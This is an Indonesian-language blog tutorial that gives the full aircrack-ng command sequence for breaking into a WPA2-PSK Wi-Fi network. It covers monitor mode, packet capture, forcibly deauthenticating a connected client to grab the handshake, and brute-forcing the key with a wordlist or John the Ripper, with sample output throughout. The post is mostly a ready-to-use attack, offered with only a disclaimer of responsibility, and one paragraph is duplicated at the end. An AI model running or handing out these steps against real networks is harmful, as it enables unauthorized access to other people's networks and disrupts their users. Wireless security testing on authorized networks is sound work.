* Cari jaringan nirkabel/WIFI (yang dilindungi dengan WPA2 dan Shared Key Pra)
* Menangkap semua paket
* Tunggu sampai Anda melihat seorang klien dan deauthenticate klien, sehingga handshake dapat ditangkap
* Crack password menggunakan dictionary file (atau melalui John The Ripper)
Saya disini menggunakan interface jaringan Dlink DWL-G122 (USB) nirkabel dalam prosedur ini. Dalam backtrack4, perangkat ini tardeteksi sebagai wlan0.
Pertama, card interface dalam mode monitor:
root@bt:~# airmon-ng
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0)
ath1 Atheros madwifi-ng VAP (parent: wifi0)
wlan0 Ralink 2573 USB rt73usb - [phy0]
(monitor mode enabled on mon0)
Ok, kita sekarang dapat menggunakan interface mon0setelah itu Mari kita cari jaringan nirkabel/wifi yang menggunakan WPA2 / PSK:
root@bt:~# airodump-ng mon0 CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet BSSID STATION PWR Rate Lost Packets Probe 00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNetstop airodump-ng dan jalankan lagi, lalu salin semua paket ke disk:
airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2
Pada point ini, Anda memiliki 2 pilihan: menunggu sampai klien terhubung dan terkoneksi, atau “deauthenticate” klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita sedikit memaksa dengan pilihan “ deauthenticate”. Kita membutuhkan BSSID dari AP (-a) dan mac dari client yang terhubung (-c)
root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0 13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs] airodump-ng akan menunjukkan "WPA Handshake" di sudut kanan atas
CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet
BSSID STATION PWR Rate Lost Packets Probe
00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230
Stop airodump-ng dan pastikan file yang dibuat dengan benar
root@bt:/# ls /tmp/wpa2* -al -rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap -rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv -rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csvCrackingpassword WPA2PSKdidasarkan padabruteforcing, dan dapatmemakan waktu yang sangatsangat lama. Ada2carabruteforcing: salah satu yangrelatif cepatnamun tidak menjaminkesuksesan dansalah satu yangsangat lambat, namunmenjamin bahwa Andaakan menemukan password di beberapatitik .
Opsi pertamaadalah denganmenggunakan fileworklist/drstionary. Banyakfile-file inidapat ditemukandi internet(misalnya www.theargon.comatau dipacketstorm ), atau dapatdihasilkandengan alat sepertiJohn TheRipper. Setelahwordlistdibuat, semua yang perlu Andalakukan adalah menjalankanaircrack-ngdenganworklistdanfeed. Topi yangberisiHandshakeWPA2.
Jadi jikawordlistAnda disebutword.lst(under /tmp/wordlists)Anda dapat menjalankan :aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap
Kemungkinan anda sudah mendapatkan password WPA2 PSK dengan sangat cepat ,namun pada metode Metode kedua (bruteforcing) akan pasti berhasil 99 % namum perlu waktu lama untuk menyelesaikannya, Perlu anda diingat,
kunci WPA2 bisa sampai 64 karakter, sehingga dalam teori Anda akan
membangun setiap kombinasi password dengan semua set karakter, perintah untuk menggunakan nya :
root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7 -w - /tmp/wpa2*.cap
Warning !!! Saya tidak bertanggung jawab atas penyalahgunaan dsb ….
Pada titik ini, Anda memiliki 2 pilihan: baik menunggu sampai klien terhubung dan jabat tangan 4-arah selesai, atau deauthenticate klien yang ada dan dengan demikian memaksanya untuk reassociate. Waktu adalah uang, jadi mari kita memaksa deauthenticate. Kita membutuhkan BSSID dari AP (-a) dan mac dari client yang terhubung (-c)
Tidak ada komentar:
Posting Komentar